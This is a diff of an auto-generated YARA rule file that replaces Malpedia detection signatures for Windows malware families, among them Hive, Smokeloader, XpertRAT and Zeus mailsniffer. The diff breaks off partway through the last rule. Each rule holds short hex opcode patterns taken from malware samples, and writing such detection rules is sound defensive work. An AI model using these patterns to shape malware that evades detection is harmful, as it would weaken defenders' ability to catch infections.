 		license_url = "N/A"
-		logic_hash = "f99d6584928c86c24bca7d34fc6463d62a033b67ff2c46d0cd8c512898739c50"
+		logic_hash = "639d2f4f2de7d57a54ced0a82f1a1b4924ec9dac72884175b29f7cbb63a0d4bc"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -85955,34 +85902,34 @@ rule MALPEDIA_Win_Minipocket_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83f83b 0f87ba000000 8b7df0 8bc7 }
-		$sequence_1 = { 488364242800 4533c9 488364242000 488bc8 458d4110 }
-		$sequence_2 = { 456bc021 4403c0 ffc7 8bc7 8a0417 84c0 75eb }
-		$sequence_3 = { 4c8d9c24d0020000 498b5b18 498b7b20 498be3 }
-		$sequence_4 = { c744245492469e5a ff15???????? 488bd8 4883f8ff 0f8412010000 488364243000 488d542450 }
-		$sequence_5 = { 410fb70449 6685c0 75ea 413bd3 7419 413bd2 }
-		$sequence_6 = { eb11 0fbec0 456bc021 4403c0 ffc7 8bc7 }
-		$sequence_7 = { 498b4010 4c8b00 eb30 410fb701 }
-		$sequence_8 = { 443bc5 7421 ffc1 4983c204 3bce 72ca 33c0 }
-		$sequence_9 = { 7474 ba68000000 488d4d80 e8???????? ba18000000 c7458068000000 488d4c2460 }
+		$sequence_0 = { 48b93448af150d8462e4 4801c8 4c89e1 ffd0 488b05???????? 48b93b8ce2c7a3ecddc7 488b0408 }
+		$sequence_1 = { ffd7 0f104508 0f104d18 0f105524 410f1154244c 410f114c2440 410f11442430 }
+		$sequence_2 = { 48b93f5d14dd8256b94f 488b0408 4c01e8 4c89f9 4889fa 4189e8 ffd0 }
+		$sequence_3 = { ffd0 898688000000 488d8e8c000000 488b05???????? 48bab6b1569bc6a2bb92 48033c10 ffd7 }
+		$sequence_4 = { bd05000000 8d42cf 49bee5819fecd253eebe 83f809 0f8364020000 49bfdd819fecd253eebe 0f1f440000 }
+		$sequence_5 = { 4989d3 4983e307 7420 4531d2 6690 420fbe3c11 66418938 }
+		$sequence_6 = { 56 4883ec20 4889ce 488b05???????? 48b90d1dc3fe89299d3f 48ba098af7fc2873d775 48031408 }
+		$sequence_7 = { 884101 440fb64202 4489c0 34e2 4420c0 4189c1 4180e1fa }
+		$sequence_8 = { 84c0 0f85b2030000 488b07 4c8b36 0fb64f08 baffffffff 41baffffffff }
+		$sequence_9 = { 4d89c6 4889d6 488b05???????? 49b89bc488db85ad3022 48baadb54d2cbea5f70f 4a8b0400 4801d0 }
 
 	condition:
-		7 of them and filesize < 34816
+		7 of them and filesize < 3117056
 }
-rule MALPEDIA_Win_Zeus_Mailsniffer_Auto : FILE
+rule MALPEDIA_Win_Hive_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fb336c30-936c-5161-8554-4fa39d727895"
+		id = "afed1177-c874-5c40-8ff0-eb8fbf356303"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_mailsniffer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.zeus_mailsniffer_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hive"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hive_auto.yar#L1-L195"
 		license_url = "N/A"
-		logic_hash = "b88fdb233f08271f4c82945f7e7e3b8d498570e4526ea1a19d24dcafd9d77060"
+		logic_hash = "2741699b9ca4dafd7c3cf41d98fd9bcda89c6f9e810164b470706ce97b3270bd"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -85994,32 +85941,44 @@ rule MALPEDIA_Win_Zeus_Mailsniffer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 81ec1c020000 56 6a1c 58 8945f0 c745f4c89d2d01 8945f8 }
-		$sequence_1 = { 0f8486000000 6a10 58 e8???????? 8bf0 85f6 }
-		$sequence_2 = { e8???????? 83c40c 833e00 894608 897e0c 7421 }
-		$sequence_3 = { 8b4508 8b4dec c745f451000000 8908 83ff17 750f }
-		$sequence_4 = { e8???????? 57 68???????? 57 e8???????? 83c424 }
-		$sequence_5 = { 85c0 0f8498010000 8b45f4 8365c800 83c004 }
-		$sequence_6 = { 57 8d85ecfeffff 50 53 8d85b4faffff }
-		$sequence_7 = { ff15???????? ffb424f4040000 ff15???????? 8b8424cc040000 }
-		$sequence_8 = { 83c410 85ff 742c 8b462c ff7608 ff7628 85c0 }
-		$sequence_9 = { 743f 66833f00 7439 56 6a16 8d75e4 58 }
+		$sequence_0 = { 31c0 b91d000000 31d2 31db }
+		$sequence_1 = { 31c9 eb12 0fb6540c12 0fb63408 }
+		$sequence_2 = { 89c2 e8???????? b801000000 e8???????? }
+		$sequence_3 = { 31c9 31d2 31db 31f6 31ff eb09 }
+		$sequence_4 = { 31c0 31c9 31d2 bb01000000 beae000000 }
+		$sequence_5 = { 89d1 e8???????? b802000000 e8???????? }
+		$sequence_6 = { 81c4b0000000 c3 e8???????? 90 }
+		$sequence_7 = { 0fb6b40495000000 89d7 31f2 01c2 }
+		$sequence_8 = { 89d1 e8???????? b901000000 e8???????? }
+		$sequence_9 = { 0fb7442404 8b0c24 894c246a 668944246e 8b4c246a }
+		$sequence_10 = { 0fb7744c12 89d7 31f2 01ca }
+		$sequence_11 = { 31c9 31d2 bb04000000 beb8000000 }
+		$sequence_12 = { 01c1 83c101 83f90c 0f820fffffff }
+		$sequence_13 = { 89bc2478020000 81c438020000 c3 97 88442443 97 892c24 }
+		$sequence_14 = { 01c8 89c1 c1e91f ffc9 }
+		$sequence_15 = { 89bc2480000000 89b424c4000000 29ce 46 }
+		$sequence_16 = { 01c1 c1e106 0fb6c2 01c8 }
+		$sequence_17 = { 01c2 b8ffffff03 21c5 21c3 }
+		$sequence_18 = { 01c8 c1e006 400fb6cf 01c1 }
+		$sequence_19 = { 01c1 c1e106 400fb6d6 01ca }
+		$sequence_20 = { 01ca c1e206 0fb6c3 01d0 }
+		$sequence_21 = { 01c0 4000f8 0fb6c0 48898424b0000000 }
 
 	condition:
-		7 of them and filesize < 368640
+		7 of them and filesize < 7946240
 }
-rule MALPEDIA_Win_Bid_Ransomware_Auto : FILE
+rule MALPEDIA_Win_Misfox_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ce47ce7f-14e1-59ae-ba57-79394ad6dc42"
+		id = "7c26cb13-6097-513e-b029-4599c7648809"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bid_ransomware"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bid_ransomware_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.misfox"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.misfox_auto.yar#L1-L165"
 		license_url = "N/A"
-		logic_hash = "f1877b67a4049109e0b2de66aad3ce4469b6223b173e84f5ebaf276fe703ce2d"
+		logic_hash = "d0174e7f68a85bf1ff57434ec100f8da7228de9ad77dd40f610066f3391b57bd"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -86033,32 +85992,38 @@ rule MALPEDIA_Win_Bid_Ransomware_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d45a4 50 6a00 6a00 68???????? 6a00 }
-		$sequence_1 = { 68???????? e8???????? 85c0 0f848d000000 8b7508 ff7508 }
-		$sequence_2 = { e8???????? 60 6a00 6a02 e8???????? 8bd8 c785d4fdffff2c020000 }
-		$sequence_3 = { e8???????? c9 c3 55 8bec 60 }
-		$sequence_4 = { e8???????? 83f800 7605 8945f4 eb02 ebc9 }
-		$sequence_5 = { ff759c e8???????? 8b45a8 0500040000 894590 6800010000 }
-		$sequence_6 = { 6a00 6a00 e8???????? 6a0f 50 }
-		$sequence_7 = { ff75f4 e8???????? ff75fc e8???????? ff05???????? ff75e4 e8???????? }
-		$sequence_8 = { e8???????? 8d85d4fdffff 50 53 e8???????? ebb4 53 }
-		$sequence_9 = { 6a00 8d00 50 e8???????? eb79 8b5814 66813b5c5c }
+		$sequence_0 = { 8d85f4ebffff 50 8b8528e5ffff 8b048550870110 }
+		$sequence_1 = { 8a0a 42 884dab 83f80b 0f877b020000 ff2485b4d30010 }
+		$sequence_2 = { 8947fc 894c9308 81fe00010000 7ccc }
+		$sequence_3 = { 85f6 75e8 8b5c2410 68???????? 8d8424e8000000 6a20 }
+		$sequence_4 = { 0f85a0000000 8b4c240c 8d542418 50 50 50 }
+		$sequence_5 = { 8b06 6a25 40 50 8d45d0 50 }
+		$sequence_6 = { 8d8c24a4000000 c784245003000000000000 e8???????? 8d4c246c }
+		$sequence_7 = { 8b4708 8d5704 8902 8b45b8 52 c70300000000 40 }
+		$sequence_8 = { ff15???????? 483305???????? 488d15cabc0000 488bcb }
+		$sequence_9 = { 442bc8 b8b1f98cb3 41f7e9 b8b1f98cb3 458d0411 41c1f80a }
+		$sequence_10 = { 4c897c2438 8b442440 89442430 4c897c2428 4c897c2420 4533c9 }
+		$sequence_11 = { 4889442450 e8???????? 488d053cf90000 488d15b56c0100 }
+		$sequence_12 = { 7526 4c8d3505500100 493bde 7408 }
+		$sequence_13 = { 803c3000 75f7 4c8bc6 488d542438 498bce e8???????? 498bc6 }
+		$sequence_14 = { 0f114580 f20f100d???????? f20f114d90 8b05???????? 894598 }
+		$sequence_15 = { e9???????? 4c8d25af510100 8bee 41bf01000000 }
 
 	condition:
-		7 of them and filesize < 57344
+		7 of them and filesize < 266240
 }
-rule MALPEDIA_Win_Longwatch_Auto : FILE
+rule MALPEDIA_Win_Flashflood_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ce0e9c11-46ca-5532-8823-1deb885f5c74"
+		id = "d9f5526b-ab62-532b-9666-be6697f92fbf"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.longwatch"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.longwatch_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flashflood"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.flashflood_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "9dae6296ff953841361d58c7b1fa7eff6214a00cb7112d7c5966dd21deae5ffb"
+		logic_hash = "446473d1c32fe4cdbf702296b6f8adbdf5ae7aa855f826a53c94075ec6207623"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -86072,32 +86037,32 @@ rule MALPEDIA_Win_Longwatch_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83fb12 741e 83fb03 7419 }
-		$sequence_1 = { 8b4004 c74410e8a0bb4200 8b42e8 8b4804 8d41e8 894411e4 }
-		$sequence_2 = { 750b 8b0d???????? e8???????? e8???????? 83ec18 }
-		$sequence_3 = { 8d8d48ffffff 68???????? e8???????? 85c0 8d8d30ffffff 8b8530ffffff }
-		$sequence_4 = { 33f6 3bc8 740c 8b0cb5f8344200 46 }
-		$sequence_5 = { e8???????? 83ec14 c645fc02 8bcc 8bd0 51 }
-		$sequence_6 = { c705????????01000000 c705????????01000000 6a04 58 6bc000 8b4d08 898894004300 }
-		$sequence_7 = { eb0f 8ad3 8d8d40ffffff e8???????? 8ad3 }
-		$sequence_8 = { 1bc0 83c801 85c0 745b e8???????? }
-		$sequence_9 = { 8d8d48ffffff c78548ffffffdc334200 e8???????? 83ec08 c745fc02000000 }
+		$sequence_0 = { ff15???????? eb0c ff7508 ff75fc ff15???????? 3975fc 5e }
+		$sequence_1 = { 8b45ec 52 8d55f8 52 8b08 6a10 }
+		$sequence_2 = { 8b5508 8b427c 6bc00c 33c9 668b88ec914000 8b5508 }
+		$sequence_3 = { c21000 b8???????? c3 33c9 394c2408 7e0f }
+		$sequence_4 = { 8b45f4 25ffff0000 33c9 8a88b0984000 894de8 eb17 8b55f4 }
+		$sequence_5 = { 8d853cf9ffff 50 ff15???????? 83c420 }
+		$sequence_6 = { 33c0 eb0a 57 ff15???????? 6a01 58 5f }
+		$sequence_7 = { 6a01 57 e8???????? 6a01 e8???????? }
+		$sequence_8 = { 50 e8???????? ff45fc 83c610 }
+		$sequence_9 = { 8a0406 8ad0 c0ea04 c0e004 02d0 }
 
 	condition:
-		7 of them and filesize < 647168
+		7 of them and filesize < 114688
 }
-rule MALPEDIA_Win_Broler_Auto : FILE
+rule MALPEDIA_Win_Expiro_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1cf91de0-5126-5e8f-b11c-1d3db3402e61"
+		id = "6fa4b0d5-e65d-5709-9429-c535e22a563a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.broler"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.broler_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.expiro"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.expiro_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "fcd117231e6be08bdf633689556086666ed79e35ac782c6838a07603ffb215e5"
+		logic_hash = "e9646f75b21b41c42f31fadf4efd1887628909c4616d1866a9062fcf7c528d57"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -86111,32 +86076,32 @@ rule MALPEDIA_Win_Broler_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 51 6a01 53 ff15???????? 8bf0 ff15???????? 3bf3 }
-		$sequence_1 = { 68e9fd0000 ff15???????? 8bc6 c6043e00 8d5001 }
-		$sequence_2 = { c785c0feffff0f000000 899dbcfeffff 889dacfeffff 39b5a4feffff }
-		$sequence_3 = { 8bf0 8d45d4 3bc6 7461 837de810 720c 8b4dd4 }
-		$sequence_4 = { 57 8d8da8feffff e8???????? 83c408 33c0 8a4c05f0 8888f8cd4100 }
-		$sequence_5 = { 8b3d???????? 53 ffd7 56 ffd7 8d8d70fdffff }
-		$sequence_6 = { b8???????? 8db554ffffff c78568ffffff0f000000 e8???????? 8d8570ffffff }
-		$sequence_7 = { 8bdf c1fb18 c1f818 81e3ff000000 3283085a4100 8b5d0c }
-		$sequence_8 = { 3299085a4100 c1fe08 81e6ff000000 8bca c1f908 88580d }
-		$sequence_9 = { 83fb10 7305 8d5508 8bca 2bc6 83e819 50 }
+		$sequence_0 = { 52 e8???????? 83c404 385c2413 0f85ddfdffff b8???????? 8d4c2414 }
+		$sequence_1 = { 02abd9737373 739b 057d737313 7173 7373 7373 }
+		$sequence_2 = { 8d7558 c684244802000002 33c0 c7461407000000 895e10 668906 }
+		$sequence_3 = { 367bf8 337ffa 36871b 49 16 62639b }
+		$sequence_4 = { 56 6a00 6a00 ff15???????? b932000000 8bc3 33ed }
+		$sequence_5 = { 8b06 33d2 5f 668910 8bc6 5b c20800 }
+		$sequence_6 = { 668906 57 83c8ff 8bd6 e8???????? 897c2420 }
+		$sequence_7 = { 8b4c241c 33cc b001 e8???????? 83c420 c3 6aff }
+		$sequence_8 = { 50 8d7c247c c68424f802000003 e8???????? 83c404 c68424f402000002 837c243808 }
+		$sequence_9 = { 83c8ff b9???????? 8d542450 89742464 897c2460 e8???????? }
 
 	condition:
-		7 of them and filesize < 275456
+		7 of them and filesize < 3776512
 }
-rule MALPEDIA_Win_Client_Maximus_Auto : FILE
+rule MALPEDIA_Win_Grager_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "38a249dd-6d8f-54ce-920d-61d566c5cc15"
+		id = "a70321f6-0139-51d8-af48-e9ddd6504bcd"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.client_maximus"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.client_maximus_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grager"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.grager_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "5ff2445dece4914e3eb7fbfccded1318ff7646d3eb9b7b22684fe253e9bf4e40"
+		logic_hash = "d7bfc13c167a32046dd8425d3e3ec521c6bca90fe7d99db8d3d9dc97a5192526"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -86150,34 +86115,34 @@ rule MALPEDIA_Win_Client_Maximus_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 89542404 ff532c 8b5308 83c601 39730c }
-		$sequence_1 = { 8b4304 85c0 741d 8b5330 c744240800800000 c744240400000000 890424 }
-		$sequence_2 = { 890424 8954240c ff5320 ff15???????? 895c2408 }
-		$sequence_3 = { c70424???????? ffd0 a1???????? 85c0 7438 }
-		$sequence_4 = { e8???????? 8b4304 85c0 741d 8b5330 c744240800800000 c744240400000000 }
-		$sequence_5 = { 85c0 741d 8b5330 c744240800800000 }
-		$sequence_6 = { 7410 8b5330 890424 89542404 ff532c 8b5308 }
-		$sequence_7 = { 89c2 85d2 7409 c70424???????? ffd2 8d65f8 }
-		$sequence_8 = { 8b4628 85c0 7535 c70424???????? }
-		$sequence_9 = { 85c0 741d 8b5330 c744240800800000 c744240400000000 890424 }
+		$sequence_0 = { 48898534020000 4c8bc7 89853c020000 8b83d0200000 898520020000 c7852402000004000010 }
+		$sequence_1 = { 4c8d35a5e6ffff 0f1f440000 84c9 0f84d1010000 48ffc7 }
+		$sequence_2 = { bb01000000 e9???????? 8b4a08 33db 488bbfc8050000 81c113fcffff 488b7218 }
+		$sequence_3 = { 48890b 488d5308 488d4808 0f1102 e8???????? 488d058cdb0100 }
+		$sequence_4 = { 0fb605???????? 88814e050000 33c0 89814f050000 888153050000 33ff 4889b958050000 }
+		$sequence_5 = { 488bf9 488d1584a10100 b904000000 e8???????? 8bd3 488bcf }
+		$sequence_6 = { 4c8d0d45c80000 f20f101d???????? f20f100d???????? f20f59da }
+		$sequence_7 = { 4c8bc3 8d040e 488d8d44030000 898540030000 e8???????? 488d0dd61bfeff }
+		$sequence_8 = { 5d c3 8bc7 4883c470 415f 415e 415c }
+		$sequence_9 = { 4883ec20 8bd9 4c8d0d21eb0000 b904000000 4c8d050deb0000 488d1586c20000 e8???????? }
 
 	condition:
-		7 of them and filesize < 106496
+		7 of them and filesize < 487424
 }
-rule MALPEDIA_Win_Quickmute_Auto : FILE
+rule MALPEDIA_Win_Smokeloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "82702de0-3ec3-5174-97b3-ecd07741028d"
+		id = "112e04c3-8f0e-5c11-855c-ae74057a323a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.quickmute"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.quickmute_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.smokeloader_auto.yar#L1-L575"
 		license_url = "N/A"
-		logic_hash = "a1fe14ff6e270ce43f084b7c17d9cfec20868bf0fcb227ce38e0547341f7d58e"
+		logic_hash = "527784088a3890e68087680c97defe31324facf44f4c2545f19c39a5e952f5fd"
 		score = 75
-		quality = 75
+		quality = 44
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -86189,32 +86154,87 @@ rule MALPEDIA_Win_Quickmute_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c78550ffffff7265616c c78554ffffff6c6f6300 391d???????? 750f 8d8550ffffff 50 }
-		$sequence_1 = { 6a00 52 ff15???????? 83c40c 6a10 8d45ec 6a00 }
-		$sequence_2 = { 8b75fc 85f6 740c 56 }
-		$sequence_3 = { 0f8410020000 837dec00 755e 837df000 7558 837df400 }
-		$sequence_4 = { ffd7 a3???????? 833d????????00 c68560ffffff47 889d61ffffff c78562ffffff74537461 c78566ffffff72747570 }
-		$sequence_5 = { 8b7508 c7465ca89b4000 83660800 33ff 47 897e14 }
-		$sequence_6 = { 8d45b4 50 56 ffd7 a3???????? 833d????????00 }
-		$sequence_7 = { 8d7c2410 e8???????? 803d????????00 756b }
-		$sequence_8 = { 66c7855affffff656e 889d5cffffff c7855dffffff69616c73 c68561ffffff00 750f 8d954cffffff 52 }
-		$sequence_9 = { 6a0d 58 5d c3 8b04cd74c14000 5d c3 }
+		$sequence_0 = { ff15???????? 8d45f0 50 8d45e8 50 8d45e0 50 }
+		$sequence_1 = { 50 6a00 53 ff15???????? 8d45f0 50 }
+		$sequence_2 = { ff15???????? 8bf0 8d45dc 50 6a00 53 }
+		$sequence_3 = { 57 ff15???????? 6a00 6800000002 6a03 }
+		$sequence_4 = { 50 8d45e0 50 56 ff15???????? 56 ff15???????? }
+		$sequence_5 = { 740a 83c104 83f920 72f0 }
+		$sequence_6 = { e8???????? 8bf0 8d45fc 50 ff75fc 56 6a19 }
+		$sequence_7 = { 0fb64405dc 50 8d45ec 50 }
+		$sequence_8 = { 50 56 681f000f00 57 }
+		$sequence_9 = { ff15???????? bf90010000 8bcf e8???????? }
+		$sequence_10 = { 56 8d45fc 50 57 57 6a19 ff75f8 }
+		$sequence_11 = { 6800a00f00 50 a3???????? ff15???????? }
+		$sequence_12 = { 7507 33c0 e9???????? e8???????? b904010000 }
+		$sequence_13 = { 668ce8 6685c0 7406 fe05???????? }
+		$sequence_14 = { 56 ff15???????? 50 56 6a00 ff15???????? }
+		$sequence_15 = { 8b07 03c3 50 ff15???????? }
+		$sequence_16 = { 03c8 81e1ff000000 8a440c18 30042b 43 3b9c241c010000 }
+		$sequence_17 = { 8bc3 c745ec25303258 885df0 8945fc }
+		$sequence_18 = { ffb43108010000 8b84310c010000 03c7 50 8b843104010000 03c5 }
+		$sequence_19 = { 50 53 e8???????? 8d8decfdffff 8d95f0fdffff c70200000000 6800800000 }
+		$sequence_20 = { 8db5f8fdffff c60653 56 6a00 }
+		$sequence_21 = { 8985ecfdffff ffb5f0fdffff 50 53 }
+		$sequence_22 = { 8d85f0fdffff 8b750c 8b7d10 50 57 56 }
+		$sequence_23 = { 89c6 6804010000 56 57 }
+		$sequence_24 = { 31c0 66894603 8d8de8fdffff 50 50 }
+		$sequence_25 = { 50 50 50 51 50 50 56 }
+		$sequence_26 = { e8???????? 2500300038 005800 2500300038 }
+		$sequence_27 = { fc 5f 5e 5b }
+		$sequence_28 = { 89c6 89cf fc b280 31db a4 }
+		$sequence_29 = { 30d0 aa e2f3 7505 }
+		$sequence_30 = { 89e5 81ec5c060000 53 56 }
+		$sequence_31 = { 01c2 31c0 ac 01c2 }
+		$sequence_32 = { e8???????? 41b919000200 4533c0 4c8bf0 488d4540 }
+		$sequence_33 = { 4c8d4580 488b01 33d2 ff5060 }
+		$sequence_34 = { 48895c2418 48897c2420 89542410 55 488bec 4883ec60 488bf9 }
+		$sequence_35 = { 8b7b24 4c 01c7 668b0c4f 41 8b7b1c 4c }
+		$sequence_36 = { ac 01c2 85c0 75f0 }
+		$sequence_37 = { 4885c0 7428 80383c 7423 }
+		$sequence_38 = { 55 89e5 81ec54040000 53 }
+		$sequence_39 = { 4f 8d1c10 41 8b4b18 45 8b6320 4d }
+		$sequence_40 = { eb08 4863433c 8b7c1828 488bcb e8???????? 4863d7 498bcc }
+		$sequence_41 = { 4c 01c7 8b048f 4c }
+		$sequence_42 = { 8b6320 4d 01c4 ffc9 49 8d3c8c }
+		$sequence_43 = { 8b957cffffff 895164 6814318b23 8b45e4 50 }
+		$sequence_44 = { 895118 8b4584 8b4db8 89481c 8b5584 8b45b4 }
+		$sequence_45 = { 688dbdc13f 8b45e4 50 e8???????? 8945d8 8b4da0 }
+		$sequence_46 = { 56 57 007508 bbb84340c1 4a }
+		$sequence_47 = { 50 8b4dfc 51 e8???????? 85c0 7589 8b55fc }
+		$sequence_48 = { c1e002 03471c 8b0428 01e8 5e c3 }
+		$sequence_49 = { 56 89c2 8b453c 8b7c2878 }
+		$sequence_50 = { aa e2f3 7506 7404 }
+		$sequence_51 = { 894ddc c745e000000000 8b55e4 3b55dc 0f8327010000 c745e801000000 }
+		$sequence_52 = { 5b c9 c20800 55 89e5 83ec04 }
+		$sequence_53 = { 8945cc 8b4da0 8b55cc 895144 68d770a437 }
+		$sequence_54 = { 58 29c6 d1ee 037724 0fb7442efe c1e002 03471c }
+		$sequence_55 = { c1c108 3208 40 803800 75f5 31d1 }
+		$sequence_56 = { 6bc963 8b4508 33d2 f7f1 }
+		$sequence_57 = { 8946fc ad 85c0 75f3 c3 56 }
+		$sequence_58 = { 8b45e4 50 e8???????? 89459c 8b4da0 8b559c 895158 }
+		$sequence_59 = { 8b7c2878 01ef 8b7720 01ee 56 ad 01e8 }
+		$sequence_60 = { 5d 5d 2e3f 3438 }
+		$sequence_61 = { 9d d418 a1???????? 0da20e09d8 }
+		$sequence_62 = { b0b6 49 92 06 4e 55 }
+		$sequence_63 = { 00556c 9d d418 a9d61049d4 5c d6 2851d6 }
+		$sequence_64 = { 5d 5d 5d 5d 285b29 59 }
 
 	condition:
-		7 of them and filesize < 146432
+		7 of them and filesize < 245760
 }
-rule MALPEDIA_Win_Dadstache_Auto : FILE
+rule MALPEDIA_Win_Xpertrat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b2a62577-cb7e-5e21-91ce-710fa4e05555"
+		id = "a2a3325a-1f3d-5b66-85b8-5585a72bc5f8"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dadstache"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dadstache_auto.yar#L1-L167"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpertrat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.xpertrat_auto.yar#L1-L155"
 		license_url = "N/A"
-		logic_hash = "73e72c498fc907fc6a73ed239a2f6863b09267af51df13ccdd17c0fe20abede8"
+		logic_hash = "aded1ec389d65d20277f2fe9db776abf2f31c80bf4b4d804698ab1524e2b5a6d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -86228,38 +86248,38 @@ rule MALPEDIA_Win_Dadstache_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b35???????? 85c9 7403 51 ffd6 a1???????? }
-		$sequence_1 = { 6a40 6a00 8d4620 c70600000000 c7460400000000 c7460800000000 }
-		$sequence_2 = { 57 6aff 6a00 8d4508 c74424240f000000 }
-		$sequence_3 = { 756c ff15???????? 53 53 8d4d08 }
-		$sequence_4 = { 83c404 85c0 7428 8bb30c020000 8bf8 }
-		$sequence_5 = { 57 8d4304 c6437401 50 53 c7070c000000 c7431400000000 }
-		$sequence_6 = { 314608 8b470c 8bf9 31460c 0f1006 }
-		$sequence_7 = { 8b45f4 c1e808 0fb6c0 894e04 8bcb c1e918 }
-		$sequence_8 = { 8b4604 8d7604 85c0 75ee b801000000 }
-		$sequence_9 = { 57 03c3 895508 33ff 8945fc }
-		$sequence_10 = { 8b55f4 8b4485b0 85d2 8b56f8 7405 0d00020000 }
-		$sequence_11 = { 8b06 85c0 7543 8b46f8 8945ec }
-		$sequence_12 = { 8955e0 0f2805???????? 8b703c 03f0 b801000000 }
-		$sequence_13 = { c745bc56697274 50 57 c745c075616c41 }
-		$sequence_14 = { 51 ff55f4 8bf8 85ff 0f8423ffffff }
-		$sequence_15 = { 56 ff7034 ffd7 8945f8 85c0 }
+		$sequence_0 = { ff08 40 0430 ff0a 4c 000c00 }
+		$sequence_1 = { 045c ff4d40 ff08 40 }
+		$sequence_2 = { 006c70ff 0808 008f38001b26 001b 0d002a2364 ff08 }
+		$sequence_3 = { 0870ff 0d80000700 0474 ff0478 }
+		$sequence_4 = { 0808 008a3800cc1c 5e 006c70ff 0808 008f38001b26 }
+		$sequence_5 = { ff05???????? 000d???????? 0878ff 0d98000700 6e }
+		$sequence_6 = { 6c 70ff 0808 008a3800cc1c }
+		$sequence_7 = { ff0a 250004003c 6c 70ff }
